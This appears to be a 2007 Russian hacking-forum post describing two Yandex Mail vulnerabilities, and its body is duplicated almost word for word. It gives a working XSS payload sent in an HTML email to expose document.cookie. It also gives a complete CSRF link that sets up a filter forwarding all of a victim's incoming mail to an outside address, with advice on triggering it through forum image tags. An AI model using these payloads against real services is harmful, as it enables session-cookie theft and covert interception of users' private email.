V1k
19.08.2007, 19:41
1. XSS
При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида
<img src=http://ya.ru/a?');alert(document.cookie+'>
2. Mail Forwarding
При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D 0%B8%D0%B5&cliker=forward&forward_address=xakep@antichat.ru&forward_with_store=on&order=1 то отныне вся входящая почта будет пересылаться также на адрес xakep@antichat.ru. С помощью <?php header() ?> + apache + mod_rewrite можно похищать почту пользователей с незавершенными сессиями на yandex.ru, например, на этом ресурсе, используя img bbcode.
При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида
<img src=http://ya.ru/a?');alert(document.cookie+'>
2. Mail Forwarding
При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D 0%B8%D0%B5&cliker=forward&forward_address=xakep@antichat.ru&forward_with_store=on&order=1 то отныне вся входящая почта будет пересылаться также на адрес xakep@antichat.ru. С помощью <?php header() ?> + apache + mod_rewrite можно похищать почту пользователей с незавершенными сессиями на yandex.ru, например, на этом ресурсе, используя img bbcode.